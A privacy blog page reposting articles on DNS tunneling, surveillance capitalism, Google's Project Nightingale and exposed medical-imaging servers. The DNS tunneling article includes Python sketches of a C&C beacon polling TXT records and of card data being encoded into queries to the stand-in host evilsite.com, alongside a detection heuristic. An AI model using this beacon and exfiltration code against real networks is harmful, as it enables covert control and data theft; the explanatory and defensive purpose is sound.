Article 43

 

Privacy And Rights

Monday, March 09, 2020

DNS Tunneling


How Hackers Use DNS Tunneling to Own Your Network

By Ron Lifinski, Cyber Security Researcher
Cynet
October 22, 2018


Most organizations have a firewall that acts as a filter between their sensitive internal networks and the threatening global Internet. DNS tunneling has been around for a while, but it continues to cost companies, and hackers keep investing time and effort in developing tools for it. A recent study[1] found that DNS attacks in the UK alone have risen 105% in the past year. DNS tunneling is attractive: hackers can get any data in and out of your internal network while bypassing most firewalls. Whether it's used for command and control (C&C) of compromised systems, to leak sensitive data outside, or to tunnel inside your closed network, DNS tunneling poses a substantial risk to your organization. Here's everything you need to know about the attack, the tools and how to stop it.

Introduction

DNS tunneling has been around since the early 2000s, when NSTX[2], an easy-to-use tool, was published to the masses. Since then there has been a clear trend: tighter firewall security led to more widespread DNS tunneling. By 2011 it had already been used by malware such as Morto[3] and Feederbot[4] for C&C, and by FrameworkPOS[5], a popular malicious payload for point-of-sale systems, for credit card exfiltration.

Why It’s a Problem

DNS was originally made for name resolution, not for data transfer, so it's often not seen as a threat for malicious communications or data exfiltration. Because DNS is a well-established and trusted protocol, hackers know that organizations rarely analyze DNS packets for malicious activity. DNS gets less attention because most organizations focus their resources on analyzing web or email traffic, where they believe attacks most often take place. In reality, diligent endpoint monitoring is required to find and prevent DNS tunneling.
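What does such monitoring look like in practice? Below is a minimal detection sketch; the thresholds, helper names and sample query are illustrative assumptions, not something the original article specifies. The idea is simply that tunneled traffic tends to produce unusually long, high-entropy subdomains:

```python
import math
from collections import Counter

def shannon_entropy(s: str) -> float:
    """Bits per character; base32/base64-encoded payloads score high."""
    counts = Counter(s)
    total = len(s)
    return -sum(c / total * math.log2(c / total) for c in counts.values())

def looks_like_tunnel(qname: str, max_label: int = 40, min_entropy: float = 3.5) -> bool:
    """Flag a query name whose leftmost labels resemble encoded data.

    Thresholds are illustrative guesses; a real deployment would tune them
    against baseline traffic and combine this with per-domain query volume.
    """
    labels = qname.rstrip(".").split(".")
    payload = "".join(labels[:-2])  # everything left of the registered domain
    if len(payload) < 20:           # short names: not enough signal to judge
        return False
    return max(len(l) for l in labels) > max_label or shannon_entropy(payload) > min_entropy

# A base32-style blob under an attacker domain flags; a normal name does not.
print(looks_like_tunnel("nbswy3dpeb3w64tmmqqho2dboqqgs43oebqsa43f.tun.evilsite.com"))
print(looks_like_tunnel("www.example.com"))
```

A real detection stack would combine a per-query heuristic like this with volume baselines, since tunnels also stand out by the sheer number of unique subdomains they generate.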

Furthermore, tunneling toolkits have become an industry in themselves and are widely available on the Internet, so hackers don't really need technical sophistication to implement DNS tunneling attacks.

Common Abuse Cases (and the tools that make them possible)

Malware command and control (C&C) - Malware can use DNS tunneling to receive commands from its control servers and upload data to the Internet without opening a single TCP/UDP connection to an external server. Tools like DNSCAT2[6] were made specifically for C&C purposes.

Create a "firewall-bypassing tunnel" - DNS tunneling allows an attacker to reach into the internal network by creating a complete tunnel. Tools like IODINE[7] let you create a common network between devices by establishing a full IPv4 tunnel over DNS.

Bypass captive portals for paid Wi-Fi - A lot of captive portal systems allow all DNS traffic out, so it's possible to tunnel IP traffic without paying a fee. Some commercial services even provide the server-side tunnel as a service. Tools like YOUR-FREEDOM are made specifically for escaping captive portals.
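All three abuse cases ride on the same primitive: the victim resolves names under an attacker-controlled domain, and the answers carry data back. As a hedged illustration of the C&C case - a sketch of the general idea, not dnscat2's actual protocol - the loop below assumes the third-party dnspython package, a hypothetical beacon ID and the example domain introduced in the next section:

```python
# Sketch of a C&C beacon polling over DNS TXT records. Assumptions: dnspython
# is installed (pip install dnspython); the attacker domain and record format
# are hypothetical; real tools add sessions, sequencing and encryption.
import base64
import time

import dns.resolver

ATTACKER_DOMAIN = "tun.evilsite.com"  # hypothetical, see "How It Works" below

def poll_for_command(beacon_id: str) -> str | None:
    """Ask the attacker's authoritative server for work via a TXT lookup.

    To the firewall this is an ordinary recursive DNS resolution that the
    local resolver forwards out; no direct connection to the attacker exists.
    """
    try:
        answers = dns.resolver.resolve(f"{beacon_id}.cmd.{ATTACKER_DOMAIN}", "TXT")
    except dns.resolver.NXDOMAIN:
        return None  # authoritative server signals "no pending command"
    rdata = next(iter(answers))
    txt = b"".join(rdata.strings).decode()  # TXT data may be split into chunks
    return base64.b64decode(txt).decode()   # command text, base64 in this sketch

if __name__ == "__main__":
    while True:
        command = poll_for_command("beacon01")
        if command:
            print("would execute:", command)
        time.sleep(60)  # low-and-slow beaconing to evade rate-based detection
```

Because only the organization's own resolver ever talks to the outside, blocking direct outbound connections does nothing against this channel.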

How It Works

[Image: DNS tunnel diagram]

1. The attacker acquires a domain, for example, evilsite.com.

2. The attacker points the domain's name server records at his own DNS server.

3. The attacker delegates a subdomain, such as "tun.evilsite.com", and configures his machine as the subdomain's authoritative DNS server.

4. Any DNS request made by the victim to "{data}.tun.evilsite.com" will end up reaching the attacker's machine.

5. The attacker's machine encodes a response that will get routed back to the victim's machine.

6. A bidirectional data transfer channel is achieved using a DNS tunneling tool.
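To make step 4 concrete, here is a minimal sketch of the client-side encoding; the chunk size, base32 encoding and helper name are illustrative assumptions, and real tools such as IODINE[7] use their own framing, compression and record types:

```python
import base64

def payload_to_qnames(data: bytes, tunnel_domain: str = "tun.evilsite.com",
                      chunk: int = 30) -> list[str]:
    """Split a payload into DNS-safe base32 chunks, one query name per chunk.

    DNS limits labels to 63 bytes and full names to 253 bytes, which is why
    tunneling tools must fragment data across many queries.
    """
    encoded = base64.b32encode(data).decode().rstrip("=").lower()
    return [
        f"{seq}.{encoded[i:i + chunk]}.{tunnel_domain}"  # seq label keeps order
        for seq, i in enumerate(range(0, len(encoded), chunk))
    ]

# Each name is resolved by the victim's stub resolver and, via normal DNS
# delegation, ends up at the attacker's authoritative server (steps 4-5).
for qname in payload_to_qnames(b"card=4111111111111111;exp=12/25"):
    print(qname)
```

The server side simply reverses the encoding and replies in TXT, CNAME or NULL records, completing the bidirectional channel of step 6.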

References

[1] www.infosecurity-magazine.com/news/dns-attack-costs-soar-105-in-uk

[2] thomer.com/howtos/nstx.html

[3] www.symantec.com/connect/blogs/morto-worm-sets-dns-record

[4] chrisdietri.ch/post/feederbot-botnet-using-dns-command-and-control/

[5] www.gdatasoftware.com/blog/2014/10/23942-new-frameworkpos-variant-exfiltrates-data-via-dns-requests

[6] github.com/iagox86/dnscat

[7] github.com/yarrick/iodine

[8] heyoka.sourceforge.net/


Tuesday, January 28, 2020

The Age of Surveillance Capitalism


You Are Now Remotely Controlled

By Shoshana Zuboff
NY Times
January 24, 2020

The debate on privacy and law at the Federal Trade Commission was unusually heated that day. Tech industry executives argued that they were capable of regulating themselves and that government intervention would be “costly and counterproductive.” Civil libertarians warned that the companies’ data capabilities posed “an unprecedented threat” to individual freedom. One observed, “We have to decide what human beings are in the electronic age. Are we just going to be chattel for commerce?” A commissioner asked, “Where should we draw the line?” The year was 1997.

The line was never drawn, and the executives got their way. Twenty-three years later the evidence is in. The fruit of that victory was a new economic logic that I call “surveillance capitalism.” Its success depends upon one-way-mirror operations engineered for our ignorance and wrapped in a fog of misdirection, euphemism and mendacity. It rooted and flourished in the new spaces of the internet, once celebrated by surveillance capitalists as “the world’s largest ungoverned space.” But power fills a void, and those once wild spaces are no longer ungoverned. Instead, they are owned and operated by private surveillance capital and governed by its iron laws.

The rise of surveillance capitalism over the last two decades went largely unchallenged. “Digital” was fast, we were told, and stragglers would be left behind. It’s not surprising that so many of us rushed to follow the bustling White Rabbit down his tunnel into a promised digital Wonderland where, like Alice, we fell prey to delusion. In Wonderland, we celebrated the new digital services as free, but now we see that the surveillance capitalists behind those services regard us as the free commodity. We thought that we search Google, but now we understand that Google searches us. We assumed that we use social media to connect, but we learned that connection is how social media uses us. We barely questioned why our new TV or mattress had a privacy policy, but we’ve begun to understand that “privacy policies” are actually surveillance policies.

And like our forebears who named the automobile “horseless carriage” because they could not reckon with its true dimension, we regarded the internet platforms as “bulletin boards” where anyone could pin a note. Congress cemented this delusion in a statute, Section 230 of the 1996 Communications Decency Act, absolving those companies of the obligations that adhere to “publishers” or even to “speakers.”

Only repeated crises have taught us that these platforms are not bulletin boards but hyper-velocity global bloodstreams into which anyone may introduce a dangerous virus without a vaccine. This is how Facebook’s chief executive, Mark Zuckerberg, could legally refuse to remove a faked video of Speaker of the House Nancy Pelosi and later double down on this decision, announcing that political advertising would not be subject to fact-checking.

All of these delusions rest on the most treacherous hallucination of them all: the belief that privacy is private. We have imagined that we can choose our degree of privacy with an individual calculation in which a bit of personal information is traded for valued services - a reasonable quid pro quo. For example, when Delta Air Lines piloted a biometric data system at the Atlanta airport, the company reported that of nearly 25,000 customers who traveled there each week, 98 percent opted into the process, noting that “the facial recognition option is saving an average of two seconds for each customer at boarding, or nine minutes when boarding a wide body aircraft.”

In fact the rapid development of facial recognition systems reveals the public consequences of this supposedly private choice. Surveillance capitalists have demanded the right to take our faces wherever they appear - on a city street or a Facebook page. The Financial Times reported that a Microsoft facial recognition training database of 10 million images plucked from the internet without anyone’s knowledge and supposedly limited to academic research was employed by companies like IBM and state agencies that included the United States and Chinese military. Among these were two Chinese suppliers of equipment to officials in Xinjiang, where members of the Uighur community live in open-air prisons under perpetual surveillance by facial recognition systems.

Privacy is not private, because the effectiveness of these and other private or public surveillance and control systems depends upon the pieces of ourselves that we give up - or that are secretly stolen from us.

Our digital century was to have been democracy’s Golden Age. Instead, we enter its third decade marked by a stark new form of social inequality best understood as “epistemic inequality.” It recalls a pre-Gutenberg era of extreme asymmetries of knowledge and the power that accrues to such knowledge, as the tech giants seize control of information and learning itself. The delusion of “privacy as private” was crafted to breed and feed this unanticipated social divide. Surveillance capitalists exploit the widening inequity of knowledge for the sake of profits. They manipulate the economy, our society and even our lives with impunity, endangering not just individual privacy but democracy itself. Distracted by our delusions, we failed to notice this bloodless coup from above.

The belief that privacy is private has left us careening toward a future that we did not choose, because it failed to reckon with the profound distinction between a society that insists upon sovereign individual rights and one that lives by the social relations of the one-way mirror. The lesson is that privacy is public - it is a collective good that is logically and morally inseparable from the values of human autonomy and self-determination upon which privacy depends and without which a democratic society is unimaginable.

Still, the winds appear to have finally shifted. A fragile new awareness is dawning as we claw our way back up the rabbit hole toward home. Surveillance capitalists are fast because they seek neither genuine consent nor consensus. They rely on psychic numbing and messages of inevitability to conjure the helplessness, resignation and confusion that paralyze their prey. Democracy is slow, and that’s a good thing. Its pace reflects the tens of millions of conversations that occur in families, among neighbors, co-workers and friends, within communities, cities and states, gradually stirring the sleeping giant of democracy to action.

These conversations are occurring now, and there are many indications that lawmakers are ready to join and to lead. This third decade is likely to decide our fate. Will we make the digital future better, or will it make us worse? Will it be a place that we can call home?

Epistemic inequality is not based on what we can earn but rather on what we can learn. It is defined as unequal access to learning imposed by private commercial mechanisms of information capture, production, analysis and sales. It is best exemplified in the fast-growing abyss between what we know and what is known about us.

Twentieth-century industrial society was organized around the “division of labor,” and it followed that the struggle for economic equality would shape the politics of that time. Our digital century shifts society’s coordinates from a division of labor to a division of learning, and it follows that the struggle over access to knowledge and the power conferred by such knowledge will shape the politics of our time.

The new centrality of epistemic inequality signals a power shift from the ownership of the means of production, which defined the politics of the 20th century, to the ownership of the production of meaning. The challenges of epistemic justice and epistemic rights in this new era are summarized in three essential questions about knowledge, authority and power: Who knows? Who decides who knows? Who decides who decides who knows?

During the last two decades, the leading surveillance capitalists - Google, later followed by Facebook, Amazon and Microsoft - helped to drive this societal transformation while simultaneously ensuring their ascendance to the pinnacle of the epistemic hierarchy. They operated in the shadows to amass huge knowledge monopolies by taking without asking, a maneuver that every child recognizes as theft. Surveillance capitalism begins by unilaterally staking a claim to private human experience as free raw material for translation into behavioral data. Our lives are rendered as data flows.

Early on, it was discovered that, unknown to users, even data freely given harbors rich predictive signals, a surplus that is more than what is required for service improvement. It isn’t only what you post online, but whether you use exclamation points or the color saturation of your photos; not just where you walk but the stoop of your shoulders; not just the identity of your face but the emotional states conveyed by your “microexpressions;” not just what you like but the pattern of likes across engagements. Soon this behavioral surplus was secretly hunted and captured, claimed as proprietary data.

The data are conveyed through complex supply chains of devices, tracking and monitoring software, and ecosystems of apps and companies that specialize in niche data flows captured in secret. For example, testing by The Wall Street Journal showed that Facebook receives heart rate data from the Instant Heart Rate: HR Monitor, menstrual cycle data from the Flo Period & Ovulation Tracker, and data that reveal interest in real estate properties from Realtor.com - all of it without the users’ knowledge.

These data flows empty into surveillance capitalists’ computational factories, called “artificial intelligence,” where they are manufactured into behavioral predictions that are about us, but they are not for us. Instead, they are sold to business customers in a new kind of market that trades exclusively in human futures. Certainty in human affairs is the lifeblood of these markets, where surveillance capitalists compete on the quality of their predictions. This is a new form of trade that birthed some of the richest and most powerful companies in history.

In order to achieve their objectives, the leading surveillance capitalists sought to establish unrivaled dominance over the 99.9 percent of the world’s information now rendered in digital formats that they helped to create. Surveillance capital has built most of the world’s largest computer networks, data centers, populations of servers, undersea transmission cables, advanced microchips, and frontier machine intelligence, igniting an arms race for the 10,000 or so specialists on the planet who know how to coax knowledge from these vast new data continents.

With Google in the lead, the top surveillance capitalists seek to control labor markets in critical expertise, including data science and animal research, elbowing out competitors such as start-ups, universities, high schools, municipalities, established corporations in other industries and less wealthy countries. In 2016, 57 percent of American computer science Ph.D. graduates took jobs in industry, while only 11 percent became tenure-track faculty members. It’s not just an American problem. In Britain, university administrators contemplate a “missing generation” of data scientists. A Canadian scientist laments, “the power, the expertise, the data are all concentrated in the hands of a few companies.”

Google created the first insanely lucrative markets to trade in human futures, what we now know as online targeted advertising, based on their predictions of which ads users would click. Between 2000, when the new economic logic was just emerging, and 2004, when the company went public, revenues increased by 3,590 percent. This startling number represents the “surveillance dividend.” It quickly reset the bar for investors, eventually driving start-ups, apps developers and established companies to shift their business models toward surveillance capitalism. The promise of a fast track to outsized revenues from selling human futures drove this migration first to Facebook, then through the tech sector and now throughout the rest of the economy to industries as disparate as insurance, retail, finance, education, health care, real estate, entertainment and every product that begins with the word “smart” or service touted as “personalized.”

Even Ford, the birthplace of the 20th-century mass production economy, is on the trail of the surveillance dividend, proposing to meet the challenge of slumping car sales by reimagining Ford vehicles as a “transportation operating system.” As one analyst put it, Ford “could make a fortune monetizing data. They won’t need engineers, factories or dealers to do it. It’s almost pure profit.”

Surveillance capitalism’s economic imperatives were refined in the competition to sell certainty. Early on it was clear that machine intelligence must feed on volumes of data, compelling economies of scale in data extraction. Eventually it was understood that volume is necessary but not sufficient. The best algorithms also require varieties of data - economies of scope. This realization helped drive the “mobile revolution,” sending users into the real world armed with cameras, computers, gyroscopes and microphones packed inside their smart new phones. In the competition for scope, surveillance capitalists want your home and what you say and do within its walls. They want your car, your medical conditions, and the shows you stream; your location as well as all the streets and buildings in your path and all the behavior of all the people in your city. They want your voice and what you eat and what you buy; your children’s play time and their schooling; your brain waves and your bloodstream. Nothing is exempt.

Unequal knowledge about us produces unequal power over us, and so epistemic inequality widens to include the distance between what we can do and what can be done to us. Data scientists describe this as the shift from monitoring to actuation, in which a critical mass of knowledge about a machine system enables the remote control of that system. Now people have become targets for remote control, as surveillance capitalists discovered that the most predictive data come from intervening in behavior to tune, herd and modify action in the direction of commercial objectives. This third imperative, “economies of action,” has become an arena of intense experimentation. “We are learning how to write the music,” one scientist said, “and then we let the music make them dance.”

This new power to “make them dance” does not employ soldiers to threaten terror and murder. It arrives carrying a cappuccino, not a gun. It is a new “instrumentarian” power that works its will through the medium of ubiquitous digital instrumentation to manipulate subliminal cues, psychologically target communications, impose default choice architectures, trigger social comparison dynamics and levy rewards and punishments - all of it aimed at remotely tuning, herding and modifying human behavior in the direction of profitable outcomes and always engineered to preserve users’ ignorance.

We saw predictive knowledge morphing into instrumentarian power in Facebook’s contagion experiments published in 2012 and 2014, when it planted subliminal cues and manipulated social comparisons on its pages, first to influence users to vote in midterm elections and later to make people feel sadder or happier. Facebook researchers celebrated the success of these experiments, noting two key findings: that it was possible to manipulate online cues to influence real world behavior and feelings, and that this could be accomplished while successfully bypassing users’ awareness.

In 2016, the Google-incubated augmented reality game, Pokémon Go, tested economies of action on the streets. Game players did not know that they were pawns in the real game of behavior modification for profit, as the rewards and punishments of hunting imaginary creatures were used to herd people to the McDonald’s, Starbucks and local pizza joints that were paying the company for “footfall,” in exactly the same way that online advertisers pay for “click-through” to their websites.

In 2017, a leaked Facebook document acquired by The Australian exposed the corporation’s interest in applying “psychological insights” from “internal Facebook data” to modify user behavior. The targets were 6.4 million young Australians and New Zealanders. “By monitoring posts, pictures, interactions and internet activity in real time,” the executives wrote, Facebook can work out when young people feel “stressed,” “defeated,” “overwhelmed,” “anxious,” “nervous,” “stupid,” “silly,” “useless” and a “failure.” This depth of information, they explained, allows Facebook to pinpoint the time frame during which a young person needs a “confidence boost” and is most vulnerable to a specific configuration of subliminal cues and triggers. The data are then used to match each emotional phase with appropriate ad messaging for the maximum probability of guaranteed sales.

Facebook denied these practices, though a former product manager accused the company of “lying through its teeth.” The fact is that in the absence of corporate transparency and democratic oversight, epistemic inequality rules. They know. They decide who knows. They decide who decides.

The public’s intolerable knowledge disadvantage is deepened by surveillance capitalists’ perfection of mass communications as gaslighting. Two examples are illustrative. On April 30, 2019, Mark Zuckerberg made a dramatic announcement at the company’s annual developer conference, declaring, “The future is private.” A few weeks later, a Facebook litigator appeared before a federal district judge in California to thwart a user lawsuit over privacy invasion, arguing that the very act of using Facebook negates any reasonable expectation of privacy “as a matter of law.” In May 2019 Sundar Pichai, chief executive of Google, wrote in The Times of his corporation’s commitment to the principle that privacy “cannot be a luxury good.” Five months later Google contractors were found offering $5 gift cards to homeless people of color in an Atlanta park in return for a facial scan.

Facebook’s denial invites even more scrutiny in light of another leaked company document appearing in 2018. The confidential report offers rare insight into the heart of Facebook’s computational factory, where a “prediction engine” runs on a machine intelligence platform that “ingests trillions of data points every day, trains thousands of models” and then deploys them to the server fleet for “live predictions.” Facebook notes that its “prediction service” produces “more than 6 million predictions per second.” But to what purpose?

In its report, the company makes clear that these extraordinary capabilities are dedicated to meeting its corporate customers’ “core business challenges” with procedures that link prediction, microtargeting, intervention and behavior modification. For example, a Facebook service called “loyalty prediction” is touted for its ability to plumb proprietary behavioral surplus to predict individuals who are “at risk” of shifting their brand allegiance and alerting advertisers to intervene promptly with targeted messages designed to stabilize loyalty just in time to alter the course of the future.

That year a young man named Christopher Wylie turned whistle-blower on his former employer, a political consultancy known as Cambridge Analytica. “We exploited Facebook to harvest millions of people’s profiles,” Wylie admitted, “and built models to exploit what we knew about them and target their inner demons.” Mr. Wylie characterized those techniques as “information warfare,” correctly assessing that such shadow wars are built on asymmetries of knowledge and the power it affords. Less clear to the public or lawmakers was that the political firm’s strategies of secret invasion and conquest employed surveillance capitalism’s standard operating procedures, to which billions of innocent “users” are routinely subjected each day. Mr. Wylie described this mirroring process, as he followed a trail that was already cut and marked. Cambridge Analytica’s real innovation was to pivot the whole undertaking from commercial to political objectives.

In other words, Cambridge Analytica was the parasite, and surveillance capitalism was the host. Thanks to its epistemic dominance, surveillance capitalism provided the behavioral data that exposed the targets for assault. Its methods of behavioral microtargeting and behavioral modification became the weapons. And it was surveillance capitalism’s lack of accountability for content on its platform afforded by Section 230 that provided the opportunity for the stealth attacks designed to trigger the inner demons of unsuspecting citizens.

It’s not just that epistemic inequality leaves us utterly vulnerable to the attacks of actors like Cambridge Analytica. The larger and more disturbing point is that surveillance capitalism has turned epistemic inequality into a defining condition of our societies, normalizing information warfare as a chronic feature of our daily reality, prosecuted by the very corporations upon which we depend for effective social participation. They have the knowledge, the machines, the science and the scientists, the secrets and the lies. All privacy now rests with them, leaving us with few means of defense from these marauding data invaders. Without law, we scramble to hide in our own lives, while our children debate encryption strategies around the dinner table and students wear masks to public protests as protection from facial recognition systems built with our family photos.

In the absence of new declarations of epistemic rights and legislation, surveillance capitalism threatens to remake society as it unmakes democracy. From below, it undermines human agency, usurping privacy, diminishing autonomy and depriving individuals of the right to combat. From above, epistemic inequality and injustice are fundamentally incompatible with the aspirations of a democratic people.

We know that surveillance capitalists work in the shadows, but what they do there and the knowledge they accrue are unknown to us. They have the means to know everything about us, but we can know little about them. Their knowledge of us is not for us. Instead, our futures are sold for others’ profits. Since that Federal Trade Commission meeting in 1997, the line was never drawn, and people did become chattel for commerce. Another destructive delusion is that this outcome was inevitable - an unavoidable consequence of convenience-enhancing digital technologies. The truth is that surveillance capitalism hijacked the digital medium. There was nothing inevitable about it.

American lawmakers have been reluctant to take on these challenges for many reasons. One is an unwritten policy of “surveillance exceptionalism” forged in the aftermath of the Sept. 11 terrorist attacks, when the government’s concerns shifted from online privacy protections to a new zeal for “total information awareness.” In that political environment the fledgling surveillance capabilities emerging from Silicon Valley appeared to hold great promise.

Surveillance capitalists have also defended themselves with lobbying and forms of propaganda intended to undermine and intimidate lawmakers, confounding judgment and freezing action. These have received relatively little scrutiny compared to the damage they do. Consider two examples:

The first is the assertion that democracy threatens prosperity and innovation. Former Google chief executive Eric Schmidt explained in 2011: “We took the position of ‘hands off’ the internet. You know, ‘leave us alone.’ The government can make regulatory mistakes that can slow this whole thing down, and we see that and we worry about it.” This propaganda is recycled from the Gilded Age barons, whom we now call “robbers.” They insisted that there was no need for law when one had the “law of survival of the fittest,” the “laws of capital” and the “law of supply and demand.”

Paradoxically, surveillance capital does not appear to drive innovation. A promising new era of economic research shows the critical role that government and democratic governance have played in innovation and suggests a lack of innovation in big tech companies like Google. Surveillance capitalism’s information dominance is not dedicated to the urgent challenges of carbon-free energy, eliminating hunger, curing cancers, ridding the oceans of plastic or flooding the world with well paid, smart, loving teachers and doctors. Instead, we see a frontier operation run by geniuses with vast capital and computational power that is furiously dedicated to the lucrative science and economics of human prediction for profit.

The second form of propaganda is the argument that the success of the leading surveillance capitalist firms reflects the real value they bring to people. But data from the demand side suggest that surveillance capitalism is better understood as a market failure. Instead of a close alignment of supply and demand, people use these services because they have no comparable alternatives and because they are ignorant of surveillance capitalism’s shadow operations and their consequences. Pew Research Center recently reported that 81 percent of Americans believe the potential risks of companies’ data collection outweigh the benefits, suggesting that corporate success depends upon coercion and obfuscation rather than meeting people’s real needs.

In his prizewinning history of regulation, the historian Thomas McCraw delivers a warning. Across the centuries regulators failed when they did not frame strategies appropriate to the particular industries they were regulating. Existing privacy and antitrust laws are vital but neither will be wholly adequate to the new challenges of reversing epistemic inequality.

These contests of the 21st century demand a framework of epistemic rights enshrined in law and subject to democratic governance. Such rights would interrupt data supply chains by safeguarding the boundaries of human experience before they come under assault from the forces of datafication. The choice to turn any aspect of one’s life into data must belong to individuals by virtue of their rights in a democratic society. This means, for example, that companies cannot claim the right to your face, or use your face as free raw material for analysis, or own and sell any computational products that derive from your face. The conversation on epistemic rights has already begun, reflected in a pathbreaking report from Amnesty International.

On the demand side, we can outlaw human futures markets and thus eliminate the financial incentives that sustain the surveillance dividend. This is not a radical prospect. For example, societies outlaw markets that trade in human organs, babies and slaves. In each case, we recognize that such markets are both morally repugnant and produce predictably violent consequences. Human futures markets can be shown to produce equally predictable outcomes that challenge human freedom and undermine democracy. Like subprime mortgages and fossil fuel investments, surveillance assets will become the new toxic assets.

In support of a new competitive landscape, lawmakers will need to champion new forms of collective action, just as nearly a century ago legal protections for the rights to organize, to strike and to bargain collectively united lawmakers and workers in curbing the powers of monopoly capitalists. Lawmakers must seek alliances with citizens who are deeply concerned over the unchecked power of the surveillance capitalists and with workers who seek fair wages and reasonable security in defiance of the precarious employment conditions that define the surveillance economy.

Anything made by humans can be unmade by humans. Surveillance capitalism is young, barely 20 years in the making, but democracy is old, rooted in generations of hope and contest.

Surveillance capitalists are rich and powerful, but they are not invulnerable. They have an Achilles heel: fear. They fear lawmakers who do not fear them. They fear citizens who demand a new road forward as they insist on new answers to old questions: Who will know? Who will decide who knows? Who will decide who decides? Who will write the music, and who will dance?

Shoshana Zuboff (@ShoshanaZuboff) is professor emerita at Harvard Business School and the author of “The Age of Surveillance Capitalism.”



Tuesday, November 12, 2019

Project Nightingale


Google’s “Project Nightingale” analyzes medical records to create “Patient Search” for health providers

By Abner Li
9to5Google
Nov 2019

Beyond the acquisition of Fitbit earlier this month, Google’s health ambitions are multi-faceted and extend into services for hospitals and health providers. One such effort, named Project Nightingale, was detailed today, along with the end product: Patient Search.

The Wall Street Journal today reported on Project Nightingale, with Forbes providing more details on the effort, including screenshots. Ascension - one of the country’s largest healthcare systems - is moving its patient records to Google Cloud. This complete health history includes lab results, doctor diagnoses, and hospitalization records.

In turn, Google is analyzing and compiling that data into a Patient Search tool that allows doctors and other health professionals to conveniently see all patient data on an overview page.

The page includes notes about patient medical issues, test results and medications, including information from scanned documents, according to presentations viewed by Forbes.

The interface is quite straightforward and not too different from hospitals that offer results directly to patients today.

Internally, the project is being developed within Google Cloud, and 150 Googlers reportedly have access to the data. This includes Google Brain, the company’s internal AI research division. The WSJ describes another tool in development that uses machine learning to suggest possible patient treatment changes to doctors.

Google in this case is using the data, in part, to design new software, underpinned by advanced artificial intelligence and machine learning, that zeroes in on individual patients to suggest changes to their care.

That appears to be further off in the distance compared to Patient Search, which is already deployed to Ascension facilities in Florida and Texas, with more locations planned this year. Google is apparently not charging Ascension for the work and could offer the tool to other health systems in the future.

When asked for comment, Google said Project Nightingale abides by all federal laws and that privacy protections are in place. Experts who spoke to the WSJ believe that this initiative is allowed under the Health Insurance Portability and Accountability Act (HIPAA).


Wednesday, September 18, 2019

Your MRI


Maybe this explains why:

The treatment consent form included text that gives the hospital the ok to share any medical and personal information with any third party they wish, without restriction.
- Florida Hospital insists I let them do whatever they want with my medical records

Millions of Americans’ Medical Images and Data Are Available on the Internet. Anyone Can Take a Peek.
Hundreds of computer servers worldwide that store patient X-rays and MRIs are so insecure that anyone with a web browser or a few lines of computer code can view patient records. One expert warned about it for years.

By Jack Gillum, Jeff Kao and Jeff Larson
ProPublica
September 17, 2019

Medical images and health data belonging to millions of Americans, including X-rays, MRIs and CT scans, are sitting unprotected on the internet and available to anyone with basic computer expertise.

The records cover more than 5 million patients in the U.S. and millions more around the world. In some cases, a snoop could use free software programs - or just a typical web browser - to view the images and private data, an investigation by ProPublica and the German broadcaster Bayerischer Rundfunk found.

We identified 187 servers - computers that are used to store and retrieve medical data - in the U.S. that were unprotected by passwords or basic security precautions. The computer systems, from Florida to California, are used in doctors’ offices, medical-imaging centers and mobile X-ray services.

“It’s not even hacking. It’s walking into an open door,” said Jackie Singh, a cybersecurity researcher and chief executive of the consulting firm Spyglass Security. Some medical providers started locking down their systems after we told them what we had found.

Our review found that the extent of the exposure varies, depending on the health provider and what software they use. For instance, the server of U.S. company MobilexUSA displayed the names of more than a million patients, all retrievable by typing in a simple data query. Their dates of birth, doctors and procedures were also included.

Alerted by ProPublica, MobilexUSA tightened its security last week. The company takes mobile X-rays and provides imaging services to nursing homes, rehabilitation hospitals, hospice agencies and prisons. “We promptly mitigated the potential vulnerabilities identified by ProPublica and immediately began an ongoing, thorough investigation,” MobilexUSA’s parent company said in a statement.

Another imaging system, tied to a physician in Los Angeles, allowed anyone on the internet to see his patients’ echocardiograms. (The doctor did not respond to inquiries from ProPublica.)

All told, medical data from more than 16 million scans worldwide was available online, including names, birthdates and, in some cases, Social Security numbers.

Experts say it’s hard to pinpoint who’s to blame for the failure to protect the privacy of medical images. Under U.S. law, health care providers and their business associates are legally accountable for securing the privacy of patient data. Several experts said such exposure of patient data could violate the Health Insurance Portability and Accountability Act, or HIPAA, the 1996 law that requires health care providers to keep Americans’ health data confidential and secure.

Although ProPublica found no evidence that patient data was copied from these systems and published elsewhere, the consequences of unauthorized access to such information could be devastating. “Medical records are one of the most important areas for privacy because they’re so sensitive. Medical knowledge can be used against you in malicious ways: to shame people, to blackmail people,” said Cooper Quintin, a security researcher and senior staff technologist with the Electronic Frontier Foundation, a digital-rights group.

“This is so utterly irresponsible,” he said.

The issue should not be a surprise to medical providers. For years, one expert has tried to warn about the casual handling of personal health data. Oleg Pianykh, the director of medical analytics at Massachusetts General Hospital’s radiology department, said medical imaging software has traditionally been written with the assumption that patients’ data would be secured by the customer’s computer security systems.

But as those networks at hospitals and medical centers became more complex and connected to the internet, the responsibility for security shifted to network administrators who assumed safeguards were in place. “Suddenly, medical security has become a do-it-yourself project,” Pianykh wrote in a 2016 research paper he published in a medical journal.

ProPublica’s investigation built upon findings from Greenbone Networks, a security firm based in Germany that identified problems in at least 52 countries on every inhabited continent. Greenbone’s Dirk Schrader first shared his research with Bayerischer Rundfunk after discovering that some patients’ health records were at risk. The German journalists then approached ProPublica to explore the extent of the exposure in the U.S.

Schrader found five servers in Germany and 187 in the U.S. that made patients’ records available without a password. ProPublica and Bayerischer Rundfunk also scanned Internet Protocol addresses and identified, when possible, which medical provider they belonged to.

ProPublica independently determined how many patients could be affected in America, and found some servers ran outdated operating systems with known security vulnerabilities. Schrader said that data from more than 13.7 million medical tests in the U.S. were available online, including more than 400,000 in which X-rays and other images could be downloaded.

The privacy problem traces back to the medical profession’s shift from analog to digital technology. Long gone are the days when film X-rays were displayed on fluorescent light boards. Today, imaging studies can be instantly uploaded to servers and viewed over the internet by doctors in their offices.

In the early days of this technology, as with much of the internet, little thought was given to security. The passage of HIPAA required patient information to be protected from unauthorized access. Three years later, the medical imaging industry published its first security standards.

Our reporting indicated that large hospital chains and academic medical centers did put security protections in place. Most of the cases of unprotected data we found involved independent radiologists, medical imaging centers or archiving services.

One German patient, Katharina Gaspari, got an MRI three years ago and said she normally trusts her doctors. But after Bayerischer Rundfunk showed Gaspari her images available online, she said: “Now, I am not sure if I still can.” The German system that stored her records was locked down last week.

